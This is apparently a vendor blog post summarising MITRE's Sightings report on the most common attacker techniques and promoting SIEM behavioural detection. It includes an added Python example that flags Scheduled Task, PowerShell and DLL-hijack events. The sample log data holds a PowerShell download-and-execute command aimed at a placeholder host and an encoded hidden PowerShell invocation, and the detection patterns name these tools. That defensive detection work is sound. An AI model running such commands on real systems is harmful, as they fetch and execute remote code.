This month, MITRE released their Sightings report, which analyzes and reports on common attacker techniques. MITRE analyzed over 6 million sightings of attacker behavior from April 2019 through July 2021. This data was reduced down to approximately 1 million sightings, and from this data, 184 unique attacker techniques were observed.
Of these techniques, 15 of them make up 90% of the observed techniques from this time period. And of those 15, the top three (Scheduled Task/Job, Command and Scripting Interpreter, and Hijack Execution Flow) make up over half (52%) of the observed techniques.
There’s a reason that these top techniques are so popular. Understanding why is an important first step to effective detection, which extends beyond what signature-based tools can provide.
Scheduled Task is a functionality to execute a command, script or program at a scheduled time in the future, or to set up triggers to execute a command on a consistent schedule. It is a core component of the Windows operating system that can’t just be turned off. Since it’s a legitimate tool that looks relatively innocuous, Scheduled Task is also a useful resource for threat actors to maintain persistence in an environment. In addition to persistence, attackers can use Scheduled Tasks to escalate their level of privilege and execute commands that they would otherwise not have permissions to complete. Scheduled Task/Job is often used to launch other techniques, according to MITRE.
Threat actors gravitate towards Scheduled Task because it’s a living-off-the-land technique that antivirus and endpoint detection software often won’t detect. It’s no surprise that it was the number one technique according to MITRE’s data.
Command and Scripting Interpreter was the second most common technique according to MITRE’s data, but it topped the list for Red Canary’s 2021 Threat Detection Report. PowerShell was the most common observed technique in 2020, affecting nearly half of Red Canary customers. MITRE’s report echoed that sentiment, with sub-techniques PowerShell and Windows Command Shell accounting for more than a third of Command and Scripting Interpreter instances.
PowerShell is like an adversary’s Swiss Army knife. It can be used for a variety of malicious behaviors, including executing commands, obfuscating code, and downloading payloads. Windows Command Shell, though less capable, can do something very powerful: call on any executable in the system to execute arbitrary commands, such as running batch files. In other words, admin access to PowerShell and Command Shell = God Mode.
One of Blumira’s first recommendations for Windows environments is to only allow necessary users the ability to use PowerShell. Allowing developers, security practitioners or even third-parties that are issued credentials to access PowerShell opens a major security gap that adversaries will happily take advantage of.
Hijacking execution flow is when an adversary hijacks the way that an operating system runs programs, according to MITRE. The overwhelming majority of hijack execution flow observations were associated with the sub-technique DLL search order hijacking, which enables adversaries to execute malicious payloads by hijacking the library manifest that loads DLLs.
DLL hijacking is used by groups like REvil to launch ransomware attacks. The Dridex banking trojan, for instance, delivered newly created DLLs via phishing emails to evade file signature detection from antivirus software. These DLLs were sideloaded by legitimate Windows binaries, making them look like legitimate software products.
One of the major takeaways from MITRE’s report — and what the three above techniques have in common — is that attackers consistently abuse legitimate system tools, also known as living off the land. Adversaries will often breach an environment and use only legitimate tools to conduct exploration and lateral movement inside that environment to locate critical systems, weaknesses, and vulnerabilities.
These behaviors often take place over a period of days or weeks, and during this time an attacker can go undetected by endpoint detection tools because the attacker is not using anything that is known to be malicious.
This means that endpoint protection and detection tools may have a hard time detecting attacker behavior until it is too late — for example, when an attacker introduces malware into the environment. Even when EDR does alert on questionable behavior, it’s very easy for an admin to miss or dismiss an alert that looks like normal behavior without additional questionable behavior identified from other IT and security systems that provide context. A single agent alerting on a single machine often isn’t enough visibility and context to stop savvy attackers.
MITRE’s report emphasizes the importance of using security information and event management (SIEM) with detection and response capabilities to detect malicious behavior.
“Because many of the most observed techniques are associated with legitimate system activities, real-time detection analytics may miss some adversaries’ use of these techniques as they seek to avoid false positives,” the report reads. “Building robust detections and logging around these keystone techniques can therefore significantly improve an organization’s defense.”
A well-tuned SIEM is able to detect these activities because it collects and observes system logs from multiple sources. In many cases, logs indicate attacker behavior earlier in the attack stage, well before malicious tools are introduced into the environment. That means IT admins are able to remediate earlier to prevent that dreaded 2 AM call.
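As an added example (not code from this post or from Blumira), the Python below runs simple detection logic for the three top techniques over constructed log records and, as the section argues, raises an alert for a host only when more than one source agrees within a short window. Field names, the event ids used as keys and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real telemetry. Field names are assumptions, modelled on
# Windows Security 4698 (task created), PowerShell 4104 (script block), Sysmon 7 (image load).
SAMPLE_EVENTS = [
    {"ts": "2021-07-01T02:00:05", "host": "ws01", "event_id": 4698,
     "command": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2021-07-01T02:00:09", "host": "ws01", "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"ts": "2021-07-01T02:01:30", "host": "ws01", "event_id": 7,
     "image": "C:\\Windows\\System32\\svchost.exe", "image_loaded": "C:\\Users\\Public\\version.dll"},
    {"ts": "2021-07-01T09:15:00", "host": "ws02", "event_id": 4698,
     "command": "C:\\Program Files\\Backup\\backup.exe /nightly"},
    {"ts": "2021-07-01T11:40:00", "host": "ws03", "event_id": 4104,
     "script_block": "Get-Service | Where-Object Status -eq 'Running'"},
]

INTERPRETERS = re.compile(r"(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32)\.exe", re.I)
SUSPICIOUS_PS = re.compile(r"(-enc|-e )|IEX|Invoke-Expression|DownloadString|FromBase64String", re.I)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")

def classify(ev):
    """Map one event to a MITRE technique id, or None if it looks benign on its own."""
    if ev["event_id"] == 4698 and INTERPRETERS.search(ev.get("command", "")):
        return "T1053 Scheduled Task/Job"
    if ev["event_id"] == 4104 and SUSPICIOUS_PS.search(ev.get("script_block", "")):
        return "T1059 Command and Scripting Interpreter"
    if ev["event_id"] == 7:
        image, dll = ev["image"].lower(), ev["image_loaded"].lower()
        # An OS binary loading a DLL from a user-writable location: the search order hijack pattern.
        if image.startswith(TRUSTED_DIRS[0]) and not dll.startswith(TRUSTED_DIRS):
            return "T1574 Hijack Execution Flow"
    return None

def correlate(events, window=timedelta(minutes=30), min_techniques=2):
    """Alert per host only when distinct techniques fire together inside the window.
    A lone hit is kept as context rather than raised: correlation across sources decides."""
    hits = defaultdict(list)
    for ev in events:
        tech = classify(ev)
        if tech:
            hits[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tech))
    alerts = {}
    for host, items in hits.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            techs = {t for ts, t in items[i:] if ts - start <= window}
            if len(techs) >= min_techniques:
                alerts[host] = sorted(techs)
                break
    return alerts
```

Running `correlate(SAMPLE_EVENTS)` flags only ws01, where three techniques land within two minutes; the nightly backup task on ws02 and the routine PowerShell on ws03 never become alerts.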
Detecting potentially threatening behavior and detecting known-bad file signatures are both important approaches. However, relying on “AI or ML” alone will result in a higher false positive rate and quickly become unmanageable. The behavior-based approach that a modern SIEM provides will be able to detect living off the land techniques that signature-based detection cannot. Detections that are tuned and groomed by security experts help to eliminate the noisy false positives associated with a traditional SIEM.
As attackers are using more advanced techniques and tools, a SIEM becomes a more important component of any security stack. Adversaries are actively working to ensure their tools can execute successfully even when modern endpoint detection tools are in place. Attackers have the same access to endpoint agent software as customers do and thoroughly test their attacks against them in lab environments to ensure effectiveness before using their techniques in the wild. For example, the Conti ransomware group purchased antivirus tools using shell companies and tested their malware against it every 4 hours to ensure that any capabilities added to Windows Defender wouldn’t interfere with their code.
Blumira incorporates a behavior-based approach to detect evasion techniques that antivirus and endpoint detection tools often don’t catch. Of the 15 top attacker techniques, Blumira directly maps our detection rules to 12 of these. In most cases we map to multiple sub-techniques within this list.
Our team of incident detection engineers takes an intentional approach to rule design to reduce alert fatigue. They create rules based on threat-focused research, reviewing how threat actors operate and their favored attack paths. Then they pull data from threat intel reports, emulate attacks in their lab, and test each detection across customer datasets to remove false positives.
Download our data sheet to learn more about the top MITRE techniques that Blumira can detect.